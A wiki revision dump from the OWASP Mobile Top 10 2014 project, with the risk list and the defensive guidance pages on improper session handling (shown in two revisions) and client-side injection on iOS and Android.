<span title="Share on StumbleUpon">[[File:social-stumbleupon.png|16px|Share on stumbleupon.com|link=http://stumbleupon.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on LinkedIn">[[File:social-linkedin.png|16px|Share on LinkedIn.com|link=http://www.linkedin.com/shareArticle?mini=true&url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Twitter">[[File:social-twitter.png|alt=Share on twitter.com|link=http://twitter.com/?status={{fullurle:{{FULLPAGENAME}}}}|Share on twitter.com]]</span>
<span title="Seed on Newsvine">[[File:social-newsvine.png|16px|Seed on Newsvine|link=http://www.newsvine.com/_wine/save?popoff=1&u={{fullurle:{{FULLPAGENAME}}}}]]</span>
</div>
|}
</center>
== About this list ==

In 2013 we polled the industry for new vulnerability statistics in the field of mobile applications. What you see here is a result of that data and a representation of the mobile application threat landscape.

Our road-map for 2014 includes:

* More updates to the wiki content; including cross-linking to testing guides, more visual exercises, etc.
* A PDF release.

This list is still a work in progress. We are small group doing this work and could use more help! If you are interested, please contact one of the project leads.

== Top 10 Mobile Risks - Re-Release Candidate 2014 v1.0 ==
[[File:2014-01-26 20-23-29.png|right|550px]]
*[[Mobile_Top_10_2014-M1|M1: Weak Server Side Controls ]]
*[[Mobile_Top_10_2014-M2|M2: Insecure Data Storage ]]
*[[Mobile_Top_10_2014-M3|M3: Insufficient Transport Layer Protection ]]
*[[Mobile_Top_10_2014-M4|M4: Unintended Data Leakage ]]
*[[Mobile_Top_10_2014-M5|M5: Poor Authorization and Authentication ]]
*[[Mobile_Top_10_2014-M6|M6: Broken Cryptography ]]
*[[Mobile_Top_10_2014-M7|M7: Client Side Injection ]]
*[[Mobile_Top_10_2014-M8|M8: Security Decisions Via Untrusted Inputs ]]
*[[Mobile_Top_10_2014-M9|M9: Improper Session Handling ]]
*[[Mobile_Top_10_2014-M10|M10: Lack of Binary Protections ]]

== Project Leads & Contributors ==

*[[Mobile_Top_Contributions|Mobile Top Ten Contributions Page ]]

== Archive ==

The list below is the OLD release candidate v1.0 of the OWASP Top 10 Mobile Risks.  This list was initially released on September 23, 2011 at Appsec USA.  

The original presentation can be found here: [http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks SLIDES]<br>
The corresponding video can be found here: [http://www.youtube.com/watch?v=GRvegLOrgs0 VIDEO]
*[[Mobile_Top_10_2012|2011-12 Mobile Top Ten for archive purposes]]

== Project Methodology ==

We adhered loosely to the [https://www.owasp.org/index.php/Top_10_2013/ProjectMethodology OWASP Web Top Ten Project methodology].

Mobile Top 10 2014-M9

2014-01-27T09:57:33Z

Jason Haddix:

<center>[https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks Back To The Mobile Top Ten Main Page]</center>
<center>{{Top_10_2010:SubsectionColoredTemplate|Improper Session Handling||year=2014}}</center>
{{Top_10_2010:SummaryTableHeaderBeginTemplate}}
{{Top_10_2010:SummaryTableValue-1-Template|Exploitability|EASY}}
{{Top_10_2010:SummaryTableValue-2-Template|Prevalence|COMMON}}
{{Top_10_2010:SummaryTableValue-2-Template|Detectability|EASY}}
{{Top_10_2010:SummaryTableValue-1-Template|Impact|SEVERE}}
{{Top_10_2010:SummaryTableHeaderEndTemplate}}
<td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>Anyone with access to HTTP/S traffic, cookie data, etc.</td>
<td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}> Attack vectors include physical access to the device and network traffic capture</td>
<td colspan=2 {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>Malicious or accidental session hijacking</td>
<td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>Unauthorized users gaining access to other users' accounts</td>
<td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>Customers losing control of their accounts and/or data</td>
{{Top_10_2010:SummaryTableEndTemplate}}

{{Top_10_2010:SubsectionColoredTemplate|Am I Vulnerable To Improper Session Handling?||year=2014}}
The M9 category deals with session handling and the various ways it can be done insecurely.

Improper Session Handling should be considered extremely similar to poor authentication. This is because once you are authenticated and given a session, that session allows one access to the application in question. In short, you must protect your sessions just as carefully as you protect your authentication mechanism.

Here are some examples of how it is often done improperly:

==Failure to Invalidate Sessions on the Backend==

Many developers invalidate sessions on the client side and not on the server side, leaving a major window of opportunity for attackers who are using HTTP manipulation tools. Ensure that all session invalidation events are executed on the server side and not just on the client.

==Lack of Adequate Timeout Protection==

Any mobile application you create must have adequate timeout protection on the backend components. This helps prevent both malicious and accidental potential for an unauthorized user to gain access to an existing session and assume the role of an authorized user.

Good timeout periods vary widely according to the sensitivity of the app, one's own risk profile, etc., but some good guidelines are:

* 15 minutes for high security applications
* 30 minutes for medium security applications
* 1 hour for low security applications

==Failure to Properly Rotate Cookies==

Another major problem with session management implementations is the failure to properly reset cookies during authentication state changes. Authentication state changes include events like:

* Switching from an anonymous user to a logged in user
* Switching from any logged in user to another logged in user
* Switching from a regular user to a privileged user
* Timeouts

For each of these event types, it is critical that sessions are destroyed on the server side and that the cookies presented as part of the previous sessions are no longer accepted. Ideally, your application would even detect any use of said cookies and would report that to the appropriate security team.

==Insecure Token Creation==

In addition to properly invalidating tokens (on the server side) during key application events, it's also crucial that the tokens themselves are generated properly. Just as with encryption algorithms, developers should use well-established and industry-standard methods of created tokens. They should be sufficiently long, complex, and pseudo-random so as to be resistant to guessing/anticipation attacks.

{{Top_10_2010:SubsectionColoredTemplate|How Do I Prevent Improper Session Handling?||year=2014}}

{{Mobile_Top_10_2012:SubsectionAdvancedTemplate|type={{Mobile_Top_10_2012:StyleTemplate}}|number=4|risk=2}}
References

Mobile Top 10 2014-M9

2014-01-27T09:55:48Z

Jason Haddix:

<center>[https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks Back To The Mobile Top Ten Main Page]</center>
<center>{{Top_10_2010:SubsectionColoredTemplate|Improper Session Handling||year=2014}}</center>
{{Top_10_2010:SummaryTableHeaderBeginTemplate}}
{{Top_10_2010:SummaryTableValue-1-Template|Exploitability|EASY}}
{{Top_10_2010:SummaryTableValue-2-Template|Prevalence|COMMON}}
{{Top_10_2010:SummaryTableValue-2-Template|Detectability|EASY}}
{{Top_10_2010:SummaryTableValue-1-Template|Impact|SEVERE}}
{{Top_10_2010:SummaryTableHeaderEndTemplate}}
<td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>Anyone with access to HTTP/S traffic, cookie data, etc.</td>
<td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}> Attack vectors include physical access to the device and network traffic capture</td>
<td colspan=2 {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>Malicious or accidental session hijacking</td>
<td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>Unauthorized users gaining access to other users' accounts</td>
<td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>Customers losing control of their accounts and/or data</td>
{{Top_10_2010:SummaryTableEndTemplate}}

{{Top_10_2010:SubsectionColoredTemplate|Am I Vulnerable To Improper Session Handling?||year=2014}}
The M9 category deals with session handling and the various ways it can be done insecurely.

Improper Session Handling should be considered extremely similar to poor authentication. This is because once you are authenticated and given a session, that session allows one access to the application in question. In short, you must protect your sessions just as carefully as you protect your authentication mechanism.

Here are some examples of how it is often done improperly:

<ol>
<li>Failure to Invalidate Sessions on the Backend</li>
<li>Lack of Adequate Timeout Protection</li>
<li>Failure to Properly Rotate Cookies</li>
<li>Insecure Token Creation</li>
</ol>

==Failure to Invalidate Sessions on the Backend==

Many developers invalidate sessions on the client side and not on the server side, leaving a major window of opportunity for attackers who are using HTTP manipulation tools. Ensure that all session invalidation events are executed on the server side and not just on the client.

==Lack of Adequate Timeout Protection==

Any mobile application you create must have adequate timeout protection on the backend components. This helps prevent both malicious and accidental potential for an unauthorized user to gain access to an existing session and assume the role of an authorized user.

Good timeout periods vary widely according to the sensitivity of the app, one's own risk profile, etc., but some good guidelines are:

* 15 minutes for high security applications
* 30 minutes for medium security applications
* 1 hour for low security applications

==Failure to Properly Rotate Cookies==

Another major problem with session management implementations is the failure to properly reset cookies during authentication state changes. Authentication state changes include events like:

* Switching from an anonymous user to a logged in user
* Switching from any logged in user to another logged in user
* Switching from a regular user to a privileged user
* Timeouts

For each of these event types, it is critical that sessions are destroyed on the server side and that the cookies presented as part of the previous sessions are no longer accepted. Ideally, your application would even detect any use of said cookies and would report that to the appropriate security team.

==Insecure Token Creation==

In addition to properly invalidating tokens (on the server side) during key application events, it's also crucial that the tokens themselves are generated properly. Just as with encryption algorithms, developers should use well-established and industry-standard methods of created tokens. They should be sufficiently long, complex, and pseudo-random so as to be resistant to guessing/anticipation attacks.

{{Top_10_2010:SubsectionColoredTemplate|How Do I Prevent Improper Session Handling?||year=2014}}

{{Mobile_Top_10_2012:SubsectionAdvancedTemplate|type={{Mobile_Top_10_2012:StyleTemplate}}|number=4|risk=2}}
References

Mobile Top 10 2014-M1

2014-01-27T08:51:09Z

Jason Haddix:

Mobile Top 10 2014-M10

2014-01-27T08:50:09Z

Jason Haddix:

Mobile Top 10 2014-M8

2014-01-27T08:49:43Z

Jason Haddix:

Mobile Top 10 2014-M7

2014-01-27T08:49:26Z

Jason Haddix:

<center>[https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks Back To The Mobile Top Ten Main Page]</center>
{{Top_10_2010:SubsectionColoredTemplate|<center>Client Side Injection</center>||year=2014}}
{{Top_10_2010:SummaryTableHeaderBeginTemplate}}
{{Top_10_2010:SummaryTableValue-1-Template|Exploitability|EASY}}
{{Top_10_2010:SummaryTableValue-2-Template|Prevalence|COMMON}}
{{Top_10_2010:SummaryTableValue-2-Template|Detectability|EASY}}
{{Top_10_2010:SummaryTableValue-1-Template|Impact|MODERATE}}
{{Top_10_2010:SummaryTableHeaderEndTemplate}}
<td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>Consider anyone who can send untrusted data to the system, including external users, internal users, and the application itself. </td>
<td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}> Attacker loads simple text-based attacks that exploit the syntax of the targeted interpreter. Almost any source of data can be an injection vector, including resource files or the application itself. </td>
<td colspan=2 {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>Client Side Injection for Mobile Applications is a mixed bag. To properly determine the Impact you must threat model the application. Injection attacks such as SQL Injection on client devices can be severe if your application deals with more than one user account on a single application or a shared device, or paid-for-only content. Other injection points are meant to overflow applications components but are less likely to achieve a high impact result because of the managed code protections of the application languages. </td>
<td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>As stated the Impact of client side injections can vary depending on the type of data or type of the application. </td>
<td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>Business Impacts </td>
{{Top_10_2010:SummaryTableEndTemplate}}

{{Mobile_Top_10_2012:SubsectionAdvancedTemplate|type={{Mobile_Top_10_2012:StyleTemplate}}|number=1|risk=4}}

The best way to find out if an application is vulnerable to injection is to identify the sources of input and validate that user/application supplied data is being subject to input validation, disallowing code injection. Checking the code is a fast and accurate way to see if the application is handling data correctly. Code analysis tools can help a security analyst find the use of interpreters and trace the data flow through the application. Manual penetration testers can confirm these issues by crafting exploits that confirm the vulnerability.

Since data can come from many sources in mobile applications we feel it is important list them delineated by what they are trying to achieve. In general injection attacks on mobile devices target the following:

'''Data on the Device:'''

* SQL Injection: SQLite (many phones default data storing mechanism) can be subject to injection just like in web applications. The threat of being able to see data using this type of injection is risky when your application houses several different users, paid-for/unlockable content, etc.
* Local File Inclusion: File handling on mobile devices has the same risks as stated above except it pertains to reading files that might be yours to view inside the application directory.

'''The Mobile Users Session:'''
* JavaScript Injection (XSS, Etc): The mobile browser is subject to JavaScript injection as well. Usually the mobile browser has access to the mobile applications cookie, which can lead to session theft.

'''The Application Interfaces or Functions:'''
* Several application interfaces or language functions can accept data and can be fuzzed to make applications crash. While most of these flaws do not lead to overflows because of the phone’s platforms being managed code, there have been several that have been used as a “userland” exploit in an exploit chain aimed at rooting or jailbreaking devices.

{{Mobile_Top_10_2012:SubsectionAdvancedTemplate|type={{Mobile_Top_10_2012:StyleTemplate}}|number=2|risk=4}}
In general, protecting you application from client side injection requires looking at all the areas your application can receive data from and applying some sort of input validation. In certain cases this is simple but for others it is more complex, see below:

'''iOS Specific Best Practices:'''

* '''SQLite Injection:''' When designing queries for SQLite be sure that user supplied data is being passed to a parameterized query. This can be spotted by looking for the format specifier used. In general, dangerous user supplied data will be inserted by a “%@” instead of a proper parameterized query specifer of “?”.
* '''JavaScript Injection (XSS, etc):''' Ensure that all UIWebView calls do not execute without proper input validation. Apply filters for dangerous JavaScript characters if possible, using a whitelist over blacklist character policy before rendering. If possible call mobile Safari instead of rending inside of UIWebkit which has access to your application.
* '''Local File Inclusion:''' Use input validation for NSFileManager calls.
* '''XML Injection:''' use libXML2 over NSXMLParser
* '''Format String Injection:''' Several Objective C methods are vulnerable to format string attacks:
** NSLog, [NSString stringWithFormat:], [NSString initWithFormat:], [NSMutableString appendFormat:], [NSAlert informativeTextWithFormat:], [NSPredicate predicateWithFormat:], [NSException format:], NSRunAlertPanel.
** Do not let sources outside of your control, such as user data and messages from other applications or web services, control any part of your format strings.
* '''Classic C Attacks:''' Objective C is a superset of C, avoid using old C functions vulnerable to injection such as: strcat, strcpy, strncat, strncpy, sprint, vsprintf, gets, etc.

'''Android Specific Best Practices:'''

* '''SQL Injection:''' When dealing with dynamic queries or Content-Providers ensure you are using parameterized queries.
* '''JavaScript Injection (XSS):''' Verify that JavaScript and Plugin support is disabled for any WebViews (usually the default).
* '''Local File Inclusion:''' Verify that File System Access is disabled for any WebViews (webview.getSettings().setAllowFileAccess(false);).
* '''Intent Injection/Fuzzing:''' Verify actions and data are validated via an Intent Filter for all Activities.
{{Mobile_Top_10_2012:SubsectionAdvancedTemplate|type={{Mobile_Top_10_2012:StyleTemplate}}|number=3|risk=4}}
Example Scenarios
{{Mobile_Top_10_2012:SubsectionAdvancedTemplate|type={{Mobile_Top_10_2012:StyleTemplate}}|number=4|risk=4}}
[https://developer.apple.com/library/mac/#documentation/security/conceptual/SecureCodingGuide Apple’s Secure Coding Guide]

[http://blog.fortify.com/blog/2012/07/25/Format-Strings-Is-Objective-C-Objectively-Safer Fortify Software: Format Strings - Is Objective C Objectively Safer?]

[http://www.youtube.com/watch?v=FJvyLUjbAy0 Ilja Van Sprundel – Auditing iPhone and iPad Applications]

[http://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/ Adventures with Android WebViews]

Mobile Top 10 2014-M6

2014-01-27T08:49:15Z

Jason Haddix:

Mobile Top 10 2014-M5

2014-01-27T08:49:01Z

Jason Haddix:

Mobile Top 10 2014-M4

2014-01-27T08:48:45Z

Jason Haddix: